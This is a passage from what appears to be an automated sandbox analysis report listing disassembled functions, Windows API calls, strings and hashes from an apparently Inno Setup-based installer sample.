                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 4283692357-0
                                                                                                      • Opcode ID: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                                                      • Instruction ID: 88a6b2d0cd2ebf9d052afffcb5c4be27c29a8e8e48dcb03e602a07ae18d4e81c
                                                                                                      • Opcode Fuzzy Hash: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                                                      • Instruction Fuzzy Hash: E3F05EB6B4470176EA10B6B69C8BF2B229C9F54745F10883BBA00EF2C3D97CDC04962D
                                                                                                      Function 0047CA00 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CountSleepTick
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227064392-0
                                                                                                      • Opcode ID: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                                                      • Instruction ID: e9c2c7e2fc271270d41d52dba3350464f1e42bdffd51bbfd166b1ef271046f5a
                                                                                                      • Opcode Fuzzy Hash: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                                                      • Instruction Fuzzy Hash: 93E02B7130964845CA24B2BE28C37BF4A88CB8536AB14453FF08CD6242C42C4D05956E
                                                                                                      Function 00478120 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                                                                      • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                                                                      • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 215268677-0
                                                                                                      • Opcode ID: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                                      • Instruction ID: 3331d84468cd062744280f6e1aa24963878bc2b2d96e3aea022572b3ec77581d
                                                                                                      • Opcode Fuzzy Hash: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                                                      • Instruction Fuzzy Hash: 70F030716843016BD600EAB5CC82E9B77DCEB44754F04893E7E98D72C1DA79DC08AB66
                                                                                                      Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                                      • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                                      • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 2280970139-0
                                                                                                      • Opcode ID: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                                      • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                                      • Opcode Fuzzy Hash: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                                                      • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                                      Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GlobalHandle.KERNEL32 ref: 00406287
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocHandleLockUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2167344118-0
                                                                                                      • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                      • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                                      • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                      • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                                      Function 0047A064 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                                                                      Strings
                                                                                                      • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                                                                      • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                      • API String ID: 3535843008-1938159461
                                                                                                      • Opcode ID: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                                                      • Instruction ID: 3bf0094b3715a844c7fa4d69accdb7e726d223c3dcefaf8b2e4f531663087c06
                                                                                                      • Opcode Fuzzy Hash: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                                                      • Instruction Fuzzy Hash: 5F814174E00149AFCB10DF95D881ADEBBF9EF48314F5081AAE814B7392D7389E05CB99
                                                                                                      Function 0048300C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                                                                      • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                                                                      Strings
                                                                                                      • Will not restart Windows automatically., xrefs: 00483176
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveForeground
                                                                                                      • String ID: Will not restart Windows automatically.
                                                                                                      • API String ID: 307657957-4169339592
                                                                                                      • Opcode ID: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                                      • Instruction ID: df9a9ae9a8219d8b6a1298420550b74bcee7fa449f44545fa147fc9774bd32fa
                                                                                                      • Opcode Fuzzy Hash: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                                      • Instruction Fuzzy Hash: A7413330208340AED710FFA4DC9AB6E3BA4DB15F05F1408B7E9404B3A2D6BD5A04DB1D
                                                                                                      Function 0046CEB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                                                                      • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                      • API String ID: 0-1974262853
                                                                                                      • Opcode ID: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                                      • Instruction ID: 63d40b18a6e87dbc706e62a2b7ed59e25ea13cd94e581da409b3f01416405f56
                                                                                                      • Opcode Fuzzy Hash: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                                      • Instruction Fuzzy Hash: 9A319E30A08244DFD711EB99D989BA977F6EB05308F1500FBF0489B392D779AE40CB1A
                                                                                                      Function 00478DB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                                                                      • %s\%s_is1, xrefs: 00478E2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1598650737
                                                                                                      • Opcode ID: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                                      • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                                                                      • Opcode Fuzzy Hash: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                                      • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                                                                      Function 00450154 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                                                                      • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMessageSendShell
                                                                                                      • String ID: open
                                                                                                      • API String ID: 812272486-2758837156
                                                                                                      • Opcode ID: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                                      • Instruction ID: 6e2feb9b457cb976a84d54f3b3258ed3b08e14d6ba220cef3ebd8abcd6e201e4
                                                                                                      • Opcode Fuzzy Hash: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                                      • Instruction Fuzzy Hash: 62219474E40208AFDB00DFA5C886B9EB7F8EB44705F2081BAB514E7282D7789E05CB58
                                                                                                      Function 0045527C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                                                                      • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                      • String ID: <
                                                                                                      • API String ID: 893404051-4251816714
                                                                                                      • Opcode ID: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                                                      • Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
                                                                                                      • Opcode Fuzzy Hash: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                                                      • Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
                                                                                                      Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                      • String ID: )
                                                                                                      • API String ID: 2227675388-1084416617
                                                                                                      • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                      • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                      • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                      • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                      Function 004964FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window
                                                                                                      • String ID: /INITPROCWND=$%x $@
                                                                                                      • API String ID: 2353593579-4169826103
                                                                                                      • Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                                      • Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
                                                                                                      • Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                                      • Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
                                                                                                      Function 00447424 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$AllocByteCharFreeMultiWide
                                                                                                      • String ID: NIL Interface Exception$Unknown Method
                                                                                                      • API String ID: 3952431833-1023667238
                                                                                                      • Opcode ID: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                                      • Instruction ID: aafd2560cbf8ba646f5ae6954b41d26adab4393ec7197c17a1bba45f9511721b
                                                                                                      • Opcode Fuzzy Hash: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                                      • Instruction Fuzzy Hash: 0811D6306042049FEB10DFA59D42A6EBBACEB49704F91403AF504E7681C7789D01CB69
                                                                                                      Function 0042DD74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
